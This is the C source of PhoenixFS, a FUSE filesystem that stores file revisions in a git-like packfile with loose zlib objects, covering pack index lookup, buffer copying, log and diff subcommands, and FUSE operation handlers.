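*    1 byte    delta flag (sizeof(bool))
*    8 bytes   length of the stream (sizeof(off_t))
*    n bytes   zlib-deflated contents copied from the loose file
*/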
void packup_loose_objects(FILE *packfh, const void *idx_data,
uint32_t idx_nr, const char *loosedir)
{
register int i;
FILE *datafh;
struct stat st;
bool delta = false;
char sha1_digest[40];
struct pack_idx_entry *this_entry;
/* For parsing out existing data in idx_map */
void *sha1_offset;
unsigned char this_sha1[20];
off_t this_offset;
int existing_nr;
/* Don't unnecessarily rewrite the index */
if (idx_data && !looseroot.nr) {
PHOENIXFS_DBG("packup_loose_objects:: Not rewriting idx");
return;
}
/* Write packfile and idx */
fseek(packfh, 0L, SEEK_END);
for (i = 0; i < looseroot.nr; i++) {
this_entry = looseroot.entries[i];
/* Set the offset for writing packfile index */
this_entry->offset = ftell(packfh);
/* Write the SHA1 */
fwrite(this_entry->sha1, 20, 1, packfh);
/* Write delta bit */
/* TODO: Generate real deltas! */
fwrite(&delta, sizeof(bool), 1, packfh);
/* Write the zlib stream or delta */
print_sha1(sha1_digest, this_entry->sha1);
sprintf(xpath, "%s/%s", loosedir, sha1_digest);
if ((lstat(xpath, &st) < 0) ||
!(datafh = fopen(xpath, "rb"))) {
PHOENIXFS_DBG("packup_loose_objects:: Creating %s", sha1_digest);
datafh = fopen(xpath, "wb");
}
PHOENIXFS_DBG("packup_loose_objects:: %s [%d] %lld", sha1_digest,
i, (long long int)this_entry->offset);
fwrite(&(st.st_size), sizeof(off_t), 1, packfh);
buffer_copy_bytes(datafh, packfh, st.st_size);
fclose(datafh);
}
/* If there is no pre-existing idx, just write the new idx */
if (!idx_data) {
unmap_write_idx(looseroot.entries, looseroot.nr);
return;
}
/* Update index */
/* First, add entries from the existing idx_data */
/* Skip header and fanout table */
sha1_offset = (void *) (idx_data + 8 + 256 * 4);
existing_nr = looseroot.nr;
for (i = 0; i < idx_nr; i++) {
memcpy(&this_sha1, sha1_offset, 20);
print_sha1(sha1_digest, this_sha1);
add_loose_entry(this_sha1, 0);
if (!(this_offset = find_pack_entry(this_sha1)))
PHOENIXFS_DBG("packup_loose_objects:: "
"update idx missing %s", sha1_digest);
looseroot.entries[i + existing_nr]->offset = this_offset;
sha1_offset += 20 * sizeof(unsigned char);
}
/* Write the new entries */
/* Finally, rewrite the idx */
unmap_write_idx(looseroot.entries, looseroot.nr);
}
<|start_filename|>main.c<|end_filename|>
#include "main.h"
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <limits.h>
#include <sys/stat.h>
static char path_buf[PATH_MAX] = "\0";
static void subcmd_diff(const char *pathspec1, const char *pathspec2)
{
FILE *file1, *file2;
struct stat st1, st2;
if ((stat(pathspec1, &st1) < 0) ||
(!(file1 = fopen(pathspec1, "rb"))))
die("Could not open %s: %d", pathspec1, -errno);
if ((stat(pathspec2, &st2) < 0) ||
(!(file2 = fopen(pathspec2, "rb"))))
die("Could not open %s: %d", pathspec2, -errno);
phoenixfs_diff(file1, st1.st_size, file2, st2.st_size, stdout);
fclose(file1);
fclose(file2);
}
static void subcmd_log(const char *path)
{
int rev;
FILE *infile;
struct tm *t;
struct stat st;
static char date_buf[DATE_LEN];
static char mode_buf[20];
for (rev = 0; ; rev++) {
sprintf(path_buf, "%s@%d", path, rev);
if ((stat(path_buf, &st) < 0) ||
(!(infile = fopen(path_buf, "rb"))))
break;
/* Write header */
rev ? printf("Revn:\tHEAD -%d\n", rev) : printf("Revn:\tHEAD\n");
t = localtime(&st.st_mtime);
strftime(date_buf, DATE_LEN, "%a, %d %b %Y %T", t);
printf("Date:\t%s\n", date_buf);
printf("Size:\t%lld bytes\n", (long long int)st.st_size);
switch(st.st_mode) {
case S_IFREG | 0755:
strcpy(mode_buf, "Executable file");
break;
case S_IFLNK | 0644:
strcpy(mode_buf, "Symbolic link");
break;
default:
strcpy(mode_buf, "Regular file");
break;
}
printf("Mode:\t%s\n\n", mode_buf);
/* Write contents */
buffer_copy_bytes(infile, stdout, st.st_size);
printf("\n\n");
fclose(infile);
}
}
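/*
* Example (hypothetical file name): "phoenixfs log notes.txt" opens
* "notes.txt@0", "notes.txt@1", ... until a revision is missing,
* printing a header and the full contents of each one; "@0" is HEAD
* and larger numbers reach further back in history.
*/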
static void usage(const char *progname, enum subcmd cmd)
{
switch (cmd) {
case SUBCMD_NONE:
die("Usage: %s <subcommand> [arguments ...]", progname);
case SUBCMD_MOUNT:
die("Usage: %s mount <gitdir> <mountpoint>", progname);
case SUBCMD_LOG:
die("Usage: %s log <filename>", progname);
case SUBCMD_DIFF:
die("Usage: %s diff <pathspec1> <pathspec2>", progname);
default:
die("Which subcommand?");
}
}
int main(int argc, char *argv[])
{
if ((getuid() == 0) || (geteuid() == 0))
die("Running phoenixfs as root opens unnacceptable security holes");
if (argc < 2)
usage(argv[0], SUBCMD_NONE);
/* Subcommand dispatch routine */
if (!strncmp(argv[1], "mount", 5)) {
if (argc < 4)
usage(argv[0], SUBCMD_MOUNT);
return phoenixfs_fuse(argc, argv);
} else if (!strncmp(argv[1], "log", 3)) {
if (argc < 3)
usage(argv[0], SUBCMD_LOG);
subcmd_log(argv[2]);
}
else if (!strncmp(argv[1], "diff", 4)) {
if (argc < 4)
usage(argv[0], SUBCMD_DIFF);
subcmd_diff(argv[2], argv[3]);
}
else
usage(argv[0], SUBCMD_NONE);
return 0;
}
<|start_filename|>buffer.c<|end_filename|>
#include "buffer.h"
#include <stdio.h>
#include <unistd.h>
static unsigned char buf[CHUNK];
off_t buffer_skip_bytes(FILE *src, off_t size)
{
size_t in;
off_t done = 0;
while (done < size && !feof(src) && !ferror(src)) {
in = (size - done) < CHUNK ? (size - done) : CHUNK;
done += fread(buf, 1, in, src);
}
return done;
}
off_t buffer_copy_bytes(FILE *src, FILE *dst, size_t size)
{
size_t in;
off_t done = 0;
while (done < size && !feof(src) && !ferror(src)) {
in = (size - done) < CHUNK ? (size - done) : CHUNK;
in = fread(buf, 1, in, src);
if (ferror(src) || feof(src))
return done + in;
done += in;
fwrite(buf, 1, in, dst);
if (ferror(dst) || feof(dst))
return done + buffer_skip_bytes(src, size - done);
}
return done;
}
<|start_filename|>t/test-sha1.c<|end_filename|>
#include "sha1.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/stat.h>
static void usage(const char *progname)
{
die("Usage: %s <file>", progname);
}
int main(int argc, char* argv[])
{
FILE *infile;
unsigned char sha1[20];
char sha1_digest[40];
struct stat st;
if (argc < 2)
usage(argv[0]);
if (!(infile = fopen(argv[1], "rb")))
die("Could not open %s", argv[1]);
if (stat(argv[1], &st) < 0)
die("Could not stat %s", argv[1]);
if (sha1_file(infile, st.st_size, sha1) < 0)
die("SHA1 failed");
fclose(infile);
print_sha1(sha1_digest, sha1);
printf("%s\n", sha1_digest);
return 0;
}
<|start_filename|>compress.h<|end_filename|>
#ifndef COMPRESS_H_
#define COMPRESS_H_
#include <stdio.h>
#include "common.h"
#include "buffer.h"
int zdeflate(FILE *source, FILE *dest, int level);
int zinflate(FILE *source, FILE *dest);
#endif
<|start_filename|>crc32.h<|end_filename|>
#ifndef CRC32_H_
#define CRC32_H_
#include "common.h"
#include <stdint.h>
#include <unistd.h>
uint32_t compute_crc32(uint32_t crc, const uint8_t *data, size_t length);
#endif
<|start_filename|>loose.h<|end_filename|>
#ifndef LOOSE_H_
#define LOOSE_H_
#include "common.h"
#include "buffer.h"
#include "sha1.h"
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdlib.h>
struct pack_idx_entry {
unsigned char sha1[20];
off_t offset;
size_t size;
};
struct loose_buf {
uint32_t nr;
struct pack_idx_entry **entries;
};
void add_loose_entry(const unsigned char *sha1, size_t size);
void packup_loose_objects(FILE *packfh, const void *idx_data,
uint32_t idx_nr, const char *loosedir);
void unmap_write_idx(struct pack_idx_entry *objects[], int nr_objects);
off_t find_pack_entry(const unsigned char *sha1);
#endif
<|start_filename|>pack.c<|end_filename|>
#include "pack.h"
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <assert.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <arpa/inet.h>
static struct packed_git packroot;
static bool loaded_pack = false;
/* ---- Pack Lookup ---- */
/**
* Note:
* The CRC checksum table has been omitted
*/
static off_t nth_packed_object_offset(uint32_t n)
{
const unsigned char *index = packroot.idx_data;
uint32_t off;
index += 4 * 256;
index += 8 + packroot.nr * 20;
off = ntohl(*((uint32_t *)(index + 4 * n)));
if (!(off & 0x80000000))
return off;
index += packroot.nr * 4 + (off & 0x7fffffff) * 8;
return (((uint64_t)ntohl(*((uint32_t *)(index + 0)))) << 32) |
ntohl(*((uint32_t *)(index + 4)));
}
static int sha1_entry_pos(const void *table,
size_t elem_size,
size_t key_offset,
unsigned lo, unsigned hi, unsigned nr,
const unsigned char *key)
{
const unsigned char *base = table;
const unsigned char *hi_key, *lo_key;
unsigned ofs_0;
if (!nr || lo >= hi)
return -1;
if (nr == hi)
hi_key = NULL;
else
hi_key = base + elem_size * hi + key_offset;
lo_key = base + elem_size * lo + key_offset;
ofs_0 = 0;
do {
int cmp;
unsigned ofs, mi, range;
unsigned lov, hiv, kyv;
const unsigned char *mi_key;
range = hi - lo;
if (hi_key) {
for (ofs = ofs_0; ofs < 20; ofs++)
if (lo_key[ofs] != hi_key[ofs])
break;
ofs_0 = ofs;
/*
* byte 0 thru (ofs-1) are the same between
* lo and hi; ofs is the first byte that is
* different.
*/
hiv = hi_key[ofs_0];
if (ofs_0 < 19)
hiv = (hiv << 8) | hi_key[ofs_0+1];
} else {
hiv = 256;
if (ofs_0 < 19)
hiv <<= 8;
}
lov = lo_key[ofs_0];
kyv = key[ofs_0];
if (ofs_0 < 19) {
lov = (lov << 8) | lo_key[ofs_0+1];
kyv = (kyv << 8) | key[ofs_0+1];
}
assert(lov < hiv);
if (kyv < lov)
return -1 - lo;
if (hiv < kyv)
return -1 - hi;
/*
* Even if we know the target is much closer to 'hi'
* than 'lo', if we pick too precisely and overshoot
* (e.g. when we know 'mi' is closer to 'hi' than to
* 'lo', pick 'mi' that is higher than the target), we
* end up narrowing the search space by a smaller
* amount (i.e. the distance between 'mi' and 'hi')
* than what we would have (i.e. about half of 'lo'
* and 'hi'). Hedge our bets to pick 'mi' less
* aggressively, i.e. make 'mi' a bit closer to the
* middle than we would otherwise pick.
*/
kyv = (kyv * 6 + lov + hiv) / 8;
if (lov < hiv - 1) {
if (kyv == lov)
kyv++;
else if (kyv == hiv)
kyv--;
}
mi = (range - 1) * (kyv - lov) / (hiv - lov) + lo;
if (!(lo <= mi && mi < hi))
die("assertion failure lo %u mi %u hi %u",
lo, mi, hi);
mi_key = base + elem_size * mi + key_offset;
cmp = memcmp(mi_key + ofs_0, key + ofs_0, 20 - ofs_0);
if (!cmp)
return mi;
if (cmp > 0) {
hi = mi;
hi_key = mi_key;
} else {
lo = mi + 1;
lo_key = mi_key + elem_size;
}
} while (lo < hi);
return -lo-1;
}
off_t find_pack_entry(const unsigned char *sha1)
{
const uint32_t *fanout = packroot.idx_data;
const unsigned char *sha1_idx = packroot.idx_data;
unsigned hi, lo, stride;
char sha1_digest[40];
int pos;
/* Skip the header and go to the SHA1 section */
fanout += 2;
sha1_idx += 8;
sha1_idx += 4 * 256;
hi = ntohl(fanout[*sha1]);
lo = ((*sha1 == 0x0) ? 0 : ntohl(fanout[*sha1 - 1]));
stride = 20;
print_sha1(sha1_digest, sha1);
PHOENIXFS_DBG("find_pack_entry:: %s %u %u %u", sha1_digest,
lo, hi, packroot.nr);
pos = sha1_entry_pos(sha1_idx, stride, 0,
lo, hi, packroot.nr, sha1);
PHOENIXFS_DBG("find_pack_entry:: pos = %d", pos);
if (pos < 0)
return 0;
return nth_packed_object_offset(pos);
}
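/*
* Example of the fanout narrowing above: for a SHA1 whose first byte is
* 0xab, hi = fanout[0xab] (number of entries with first byte <= 0xab)
* and lo = fanout[0xaa] (entries with a strictly smaller first byte),
* so sha1_entry_pos() only searches the entries starting with 0xab.
*/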
/**
* Format:
* <> = [sha1 | delta_bit | size | data]
*/
int unpack_entry(unsigned char *sha1, const char *loosedir)
{
unsigned char read_sha1[20];
off_t obj_offset, size;
char sha1_digest[40];
char xpath[PATH_MAX];
FILE *loosefh;
bool delta;
print_sha1(sha1_digest, sha1);
/* Convert SHA1 to offset and make sure we were successful */
if (!(obj_offset = find_pack_entry(sha1))) {
PHOENIXFS_DBG("unpack_entry:: missing %s", sha1_digest);
return -1;
}
PHOENIXFS_DBG("unpack_entry:: %s %lld", sha1_digest,
(long long int)obj_offset);
if (fseek(packroot.packfh, obj_offset, SEEK_SET) < 0)
die("Seek error: packroot.packfh");
if (fread(&read_sha1, 20 * sizeof(unsigned char), 1, packroot.packfh) < 1)
die("Read error: read_sha1");
assert(memcmp(sha1, read_sha1, 20) == 0);
if (fread(&delta, sizeof(bool), 1, packroot.packfh) < 1)
die("Read error: delta");
sprintf(xpath, "%s/%s", loosedir, sha1_digest);
if (!(loosefh = fopen(xpath, "wb+"))) {
PHOENIXFS_DBG("unpack_entry:: can't open %s", xpath);
return -errno;
}
if (!delta) {
if (fread(&size, sizeof(off_t), 1, packroot.packfh) < 1)
die("Read error: %lld", (long long int)size);
PHOENIXFS_DBG("unpack_entry:: non-delta %s", sha1_digest);
buffer_copy_bytes(packroot.packfh, loosefh, size);
}
else
PHOENIXFS_DBG("unpack_entry:: delta %s", sha1_digest);
fclose(loosefh);
return 0;
}
/* ---- Pack Read ---- */
int map_pack_idx(FILE *src)
{
int srcfd;
void *idx_map;
size_t idx_size;
uint32_t n, nr, i, *index;
struct stat st;
struct pack_idx_header *hdr;
if ((srcfd = fileno(src)) < 0)
return -errno;
fstat(srcfd, &st);
idx_size = st.st_size;
if (idx_size < 4 * 256) {
close(srcfd);
die("Pack index too small");
}
idx_map = mmap(NULL, idx_size, PROT_READ, MAP_PRIVATE, srcfd, 0);
close(srcfd);
fclose(src);
hdr = idx_map;
if (hdr->signature != htonl(PACK_IDX_SIGNATURE)) {
munmap(idx_map, idx_size);
die("Corrupt pack index signature");
}
else if (hdr->version != htonl(PACK_IDX_VERSION)) {
munmap(idx_map, idx_size);
die("Wrong pack index version");
}
index = (uint32_t *) hdr + 2;
for (i = 0, nr = 0; i < 256; i++) {
n = ntohl(index[i]);
if (n < nr) {
munmap(idx_map, idx_size);
die("Non-monotonic index");
}
nr = n;
}
/*
* Minimum size:
* - 8 bytes of header
* - 256 index entries 4 bytes each
* - 20-byte sha1 entry * nr
* - 4-byte offset entry * nr
*
* Omitted fields:
* - 4-byte crc entry * nr
* - 20-byte SHA1 of the packfile
* - 20-byte SHA1 file checksum
*/
unsigned long min_size = 8 + 4*256 + nr*(20 + 4);
unsigned long max_size = min_size;
if (nr)
max_size += (nr - 1) * 8;
if (idx_size < min_size || idx_size > max_size) {
munmap(idx_map, idx_size);
die("Wrong packfile index file size");
}
if (idx_size != min_size && (sizeof(off_t) <= 4)) {
munmap(idx_map, idx_size);
die("Pack too large for current definition of off_t");
}
packroot.idx_data = idx_map;
packroot.idx_size = idx_size;
packroot.nr = nr;
return 0;
}
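/*
* Example of the bounds checked above: with nr = 100 entries,
* min_size = 8 + 4 * 256 + 100 * (20 + 4) = 3432 bytes, and at most
* (nr - 1) * 8 = 792 additional bytes are allowed for 64-bit offsets.
*/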
static int load_pack_idx(const char *path)
{
FILE *idx_file;
if (packroot.idx_data)
return -1;
if (!(idx_file = fopen(path, "rb")))
return -errno;
return map_pack_idx(idx_file);
}
int load_packing_info(const char *pack_path, const char *idx_path,
bool existing_pack)
{
struct stat st;
struct pack_header hdr;
PHOENIXFS_DBG("load_packing_info:: %s %s %d", pack_path, idx_path, existing_pack);
if (!(loaded_pack = existing_pack)) {
/* Nothing to load */
strcpy(packroot.pack_path, pack_path);
strcpy(packroot.idx_path, idx_path);
return 0;
}
if (load_pack_idx(idx_path) < 0)
die("Packfile index %s missing", idx_path);
if (!(packroot.packfh = fopen(pack_path, "ab+")) ||
(stat(pack_path, &st) < 0))
die("Can't open pack %s", pack_path);
packroot.pack_size = st.st_size;
strcpy(packroot.pack_path, pack_path);
strcpy(packroot.idx_path, idx_path);
/*
* Minimum size:
* - 8 bytes of header
*
* Omitted fields:
* - 4 bytes of entries
* - 20-byte packfile SHA1 checksum
*/
if (packroot.pack_size < 8)
die("Wrong packfile file size");
/* Verify we recognize this pack file format */
rewind(packroot.packfh);
if (fread(&hdr, sizeof(hdr), 1, packroot.packfh) < 1)
die("Read error: hdr");
if (hdr.signature != htonl(PACK_SIGNATURE))
die("Corrupt pack signature: %d", ntohl(hdr.signature));
if (hdr.version != htonl(PACK_VERSION))
die("Wrong pack version: %d", ntohl(hdr.version));
fseek(packroot.packfh, 0L, SEEK_END);
/* Omit entries */
return 0;
}
/* ---- Pack Write ---- */
static int sha1_compare(const void *_a, const void *_b)
{
struct pack_idx_entry *a = *(struct pack_idx_entry **)_a;
struct pack_idx_entry *b = *(struct pack_idx_entry **)_b;
return memcmp(a->sha1, b->sha1, 20);
}
void unmap_write_idx(struct pack_idx_entry **objects, int nr_objects)
{
struct pack_idx_entry **sorted_by_sha, **list, **last;
unsigned int nr_large_offset;
struct pack_idx_header hdr;
off_t last_obj_offset = 0;
char sha1_digest[40];
uint32_t array[256];
register int i;
FILE *idxfh;
if (nr_objects) {
sorted_by_sha = objects;
list = sorted_by_sha;
last = sorted_by_sha + nr_objects;
for (i = 0; i < nr_objects; ++i) {
if (objects[i]->offset > last_obj_offset)
last_obj_offset = objects[i]->offset;
}
qsort(sorted_by_sha, nr_objects, sizeof(sorted_by_sha[0]),
sha1_compare);
}
else
sorted_by_sha = list = last = NULL;
if (loaded_pack)
munmap((void *) packroot.idx_data, packroot.idx_size);
if (!(idxfh = fopen(packroot.idx_path, "wb+")))
die("Can't create idx file: %s", packroot.idx_path);
hdr.signature = htonl(PACK_IDX_SIGNATURE);
hdr.version = htonl(PACK_IDX_VERSION);
fwrite(&hdr, sizeof(hdr), 1, idxfh);
/* Write the fanout table */
for (i = 0; i < 256; i++) {
struct pack_idx_entry **next = list;
while (next < last) {
struct pack_idx_entry *obj = *next;
if (obj->sha1[0] != i)
break;
next++;
}
array[i] = htonl(next - sorted_by_sha);
list = next;
}
fwrite(&array, 256 * sizeof(uint32_t), 1, idxfh);
/* Write the actual SHA1 entries: 20 * nr */
list = sorted_by_sha;
for (i = 0; i < nr_objects; i++) {
struct pack_idx_entry *obj = *list++;
fwrite(obj->sha1, 20, 1, idxfh);
}
/* Omit the crc32 table: 4 * nr */
/* Write the 32-bit offset table: 4 * nr */
nr_large_offset = 0;
list = sorted_by_sha;
for (i = 0; i < nr_objects; i++) {
struct pack_idx_entry *obj = *list++;
uint32_t offset = (obj->offset <= pack_idx_off32_limit) ?
obj->offset : (0x80000000 | nr_large_offset++);
offset = htonl(offset);
print_sha1(sha1_digest, obj->sha1);
PHOENIXFS_DBG("unmap_write_idx:: %s %llu", sha1_digest,
(long long int)obj->offset);
fwrite(&offset, sizeof(uint32_t), 1, idxfh);
}
/* Write the 64-bit offset table: 8 * nr */
list = sorted_by_sha;
while (nr_large_offset) {
struct pack_idx_entry *obj = *list++;
uint64_t offset = obj->offset;
if (offset > pack_idx_off32_limit) {
uint32_t split[2];
split[0] = htonl(offset >> 32);
split[1] = htonl(offset & 0xffffffff);
fwrite(split, sizeof(uint64_t), 1, idxfh);
nr_large_offset--;
}
}
/* Omit the checksum trailer: 2 * 20 */
for (i = 0; i < nr_objects; i++)
free(objects[i]);
fclose(idxfh);
}
static int write_pack_hdr(const char *pack_path)
{
FILE *packfh;
struct stat st;
struct pack_header hdr;
if (!(packfh = fopen(pack_path, "wb+")) ||
(stat(pack_path, &st) < 0))
return -errno;
packroot.packfh = packfh;
packroot.pack_size = st.st_size;
hdr.signature = htonl(PACK_SIGNATURE);
hdr.version = htonl(PACK_VERSION);
fwrite(&hdr, sizeof(hdr), 1, packfh);
return 0;
}
void dump_packing_info(const char *loosedir)
{
PHOENIXFS_DBG("dump_packing_info:: %s", loaded_pack ? "append" : "create");
if (!loaded_pack)
write_pack_hdr(packroot.pack_path);
packup_loose_objects(packroot.packfh, packroot.idx_data,
packroot.nr, loosedir);
fclose(packroot.packfh);
}
void mark_for_packing(const unsigned char *sha1, size_t size)
{
add_loose_entry(sha1, size);
}
<|start_filename|>fuse.c<|end_filename|>
#include "fuse.h"
#include <ctype.h>
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <fuse.h>
#include <libgen.h>
#include <limits.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdarg.h>
#include <time.h>
#include <zlib.h>
#include <ftw.h>
#include <sys/types.h>
#include <pthread.h>
static char xpath[PATH_MAX] = "\0";
static char openpath[PATH_MAX] = "\0";
static pthread_mutex_t phoenixfs_mutexlock = PTHREAD_MUTEX_INITIALIZER;
void *phoenixfs_init(struct fuse_conn_info *conn)
{
return ROOTENV;
}
static int phoenixfs_getattr(const char *path, struct stat *stbuf)
{
struct file_record *fr;
struct dir_record *dr;
int rev;
rev = parse_pathspec(xpath, path);
build_xpath(openpath, xpath, rev);
PHOENIXFS_DBG("getattr:: %s %d", openpath, rev);
/* Try underlying FS */
if (lstat(openpath, stbuf) < 0) {
/* Try fstree */
if (!(dr = find_dr(xpath))) {
if (!(fr = find_fr(xpath, rev)))
return -ENOENT;
else {
memset(stbuf, 0, sizeof(struct stat));
fill_stat(stbuf, fr);
return 0;
}
}
memset(stbuf, 0, sizeof(struct stat));
stbuf->st_mode = S_IFDIR | 0755;
}
return 0;
}
static int phoenixfs_fgetattr(const char *path, struct stat *stbuf,
struct fuse_file_info *fi)
{
PHOENIXFS_DBG("fgetattr:: %s", path);
if (fstat(fi->fh, stbuf) < 0)
return -errno;
return 0;
}
static int phoenixfs_opendir(const char *path, struct fuse_file_info *fi)
{
struct dir_record *dr;
DIR *dp;
PHOENIXFS_DBG("opendir:: %s", path);
build_xpath(xpath, path, 0);
/* Try underlying fs */
if (!(dp = opendir(xpath))) {
/* Try fstree */
if (!(dr = find_dr(path)))
return -ENOENT;
else {
/* Make the directory and open it */
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
dp = opendir(xpath);
}
}
fi->fh = (intptr_t) dp;
return 0;
}
static int phoenixfs_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi)
{
DIR *dp;
struct dirent *de;
struct stat st;
void *record;
struct node *iter_root, *iter;
struct vfile_record *vfr;
struct dir_record *dr;
register int i;
dp = (DIR *) (uintptr_t) fi->fh;
if (!(de = readdir(dp)))
return -errno;
/* Fill directories from backing FS */
do {
/* Hide the .git directory, and enumerate only directories */
if (strcmp(de->d_name, ".git") && de->d_type == DT_DIR) {
PHOENIXFS_DBG("readdir:: fs: %s", de->d_name);
if (filler(buf, de->d_name, NULL, 0))
return -ENOMEM;
}
} while ((de = readdir(dp)) != NULL);
/* Fill files from fstree */
if (!(dr = find_dr(path)) || !dr->vroot) {
PHOENIXFS_DBG("readdir:: fstree: blank");
return 0;
}
iter_root = dr->vroot;
iter = dr->vroot;
/* Use only the leaves */
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
if (!(record = find(iter_root, iter->keys[i], 0))) {
PHOENIXFS_DBG("readdir:: key listing issue");
continue;
}
vfr = (struct vfile_record *) record;
fill_stat(&st, vfr->history[vfr->HEAD]);
PHOENIXFS_DBG("readdir:: tree fill: %s", (const char *) vfr->name);
if (filler(buf, (const char *) vfr->name, &st, 0))
return -ENOMEM;
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
return 0;
}
static int phoenixfs_releasedir(const char *path, struct fuse_file_info *fi)
{
if (closedir((DIR *) (uintptr_t) fi->fh) < 0)
return -errno;
return 0;
}
static int phoenixfs_access(const char *path, int mask)
{
PHOENIXFS_DBG("access:: %s", path);
build_xpath(xpath, path, 0);
if (access(xpath, mask) < 0)
return -errno;
return 0;
}
static int phoenixfs_symlink(const char *path, const char *link)
{
char xlink[PATH_MAX];
PHOENIXFS_DBG("symlink:: %s to %s", link, path);
sprintf(xpath, "%s/%s", ROOTENV->fsback, path);
build_xpath(xlink, link, 0);
if (symlink(xpath, xlink) < 0)
return -errno;
fstree_insert_update_file(link, path);
return 0;
}
static int phoenixfs_rename(const char *path, const char *newpath)
{
char xnewpath[PATH_MAX];
struct dir_record *dr;
struct vfile_record *vfr, *new_vfr;
char *filename, *newfilename;
uint16_t key = ~0;
size_t length;
uint8_t start_rev, rev_nr;
PHOENIXFS_DBG("rename:: %s to %s", path, newpath);
build_xpath(xpath, path, 0);
build_xpath(xnewpath, newpath, 0);
if (rename(xpath, xnewpath) < 0)
return -errno;
/* Update fstree */
filename = split_basename(path, xpath);
if (!(dr = find_dr(xpath))) {
PHOENIXFS_DBG("rename:: Missing dr for %s", xpath);
return 0;
}
/* Find the old vfr to copy out data from and remove */
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("rename:: Missing vfr for %s", path);
return 0;
}
/* Make a new vfr and copy out history from old vfr */
newfilename = split_basename(newpath, NULL);
new_vfr = make_vfr(newfilename);
/* Compute start_rev and rev_nr */
if (vfr->HEAD < 0) {
start_rev = 0;
rev_nr = 0;
} else if (vfr->history[(vfr->HEAD + 1) % REV_TRUNCATE]) {
/* History is full, and is probably wrapping around */
start_rev = (vfr->HEAD + 1) % REV_TRUNCATE;
rev_nr = REV_TRUNCATE;
} else {
/* History is not completely filled */
start_rev = 0;
rev_nr = vfr->HEAD + 1;
}
PHOENIXFS_DBG("rename:: copying %d revisions", rev_nr);
while (start_rev < rev_nr) {
new_vfr->history[start_rev] = vfr->history[start_rev];
start_rev = (start_rev + 1) % REV_TRUNCATE;
}
new_vfr->HEAD = rev_nr - 1;
insert_vfr(dr, new_vfr);
/* Remove old vfr */
dr->vroot = remove_entry(dr->vroot, key);
return 0;
}
static int phoenixfs_link(const char *path, const char *newpath)
{
static char xnewpath[PATH_MAX];
PHOENIXFS_DBG("link:: %s to %s", path, newpath);
build_xpath(xpath, path, 0);
build_xpath(xnewpath, newpath, 0);
if (link(xpath, xnewpath) < 0)
return -errno;
return 0;
}
static int phoenixfs_chmod(const char *path, mode_t mode)
{
PHOENIXFS_DBG("chmod:: %s", path);
build_xpath(xpath, path, 0);
if (chmod(xpath, mode) < 0)
return -errno;
return 0;
}
static int phoenixfs_chown(const char *path, uid_t uid, gid_t gid)
{
/* chown is a no-op */
return 0;
}
static int phoenixfs_truncate(const char *path, off_t newsize)
{
PHOENIXFS_DBG("truncate:: %s to %lld", path, (long long int)newsize);
build_xpath(xpath, path, 0);
if (truncate(xpath, newsize) < 0)
return -errno;
return 0;
}
static int phoenixfs_utime(const char *path, struct utimbuf *ubuf)
{
PHOENIXFS_DBG("utime:: %s", path);
build_xpath(xpath, path, 0);
if (utime(xpath, ubuf) < 0)
return -errno;
return 0;
}
static int phoenixfs_open(const char *path, struct fuse_file_info *fi)
{
int rev, fd;
FILE *infile, *fsfile;
char fspath[PATH_MAX];
struct file_record *fr;
char sha1_digest[40];
rev = parse_pathspec(xpath, path);
build_xpath(fspath, xpath, 0);
/* Skip zinflate for entries not in fstree */
if (!(fr = find_fr(xpath, rev)))
goto END;
/* Build openpath by hand */
print_sha1(sha1_digest, fr->sha1);
sprintf(openpath, "%s/.git/loose/%s", ROOTENV->fsback, sha1_digest);
if (access(openpath, F_OK) < 0) {
/* Try extracting from packfile */
sprintf(xpath, "%s/.git/loose", ROOTENV->fsback);
if (unpack_entry(fr->sha1, xpath) < 0)
return -ENOENT;
else
PHOENIXFS_DBG("open:: pack %s", sha1_digest);
}
else
PHOENIXFS_DBG("open:: loose %s", sha1_digest);
/* zinflate openpath onto fspath */
PHOENIXFS_DBG("open:: zinflate %s onto %s", sha1_digest, fspath);
if (!(infile = fopen(openpath, "rb")) ||
!(fsfile = fopen(fspath, "wb+")))
return -errno;
if (zinflate(infile, fsfile) != Z_OK)
PHOENIXFS_DBG("open:: zinflate issue");
fclose(infile);
fclose(fsfile);
END:
if ((fd = open(fspath, fi->flags)) < 0)
return -errno;
fi->fh = fd;
return 0;
}
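/*
* Sketch of the lookup order implemented above for a versioned open
* such as "file@2": look for the object in .git/loose/<sha1>; if it is
* absent, unpack_entry() extracts it from the packfile into the loose
* directory; the loose copy is then zinflate()d onto the backing path
* before the ordinary open(2) at the end.
*/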
static int phoenixfs_mknod(const char *path, mode_t mode, dev_t dev)
{
PHOENIXFS_DBG("mknod:: %s", path);
build_xpath(xpath, path, 0);
if (mknod(xpath, mode, dev) < 0)
return -errno;
return 0;
}
/**
* If this method is not implemented or under Linux kernel
* versions earlier than 2.6.15, the mknod() and open() methods
* will be called instead.
*/
static int phoenixfs_create(const char *path, mode_t mode,
struct fuse_file_info *fi)
{
int fd;
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("create:: %s", path);
build_xpath(xpath, path, 0);
if ((fd = creat(xpath, mode)) < 0)
return -errno;
fi->fh = fd;
return 0;
}
static int phoenixfs_read(const char *path, char *buf, size_t size,
off_t offset, struct fuse_file_info *fi)
{
ssize_t read_bytes;
PHOENIXFS_DBG("read:: %s", path);
pthread_mutex_lock(&phoenixfs_mutexlock);
if ((read_bytes = pread(fi->fh, buf, size, offset)) < 0) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
pthread_mutex_unlock(&phoenixfs_mutexlock);
return read_bytes;
}
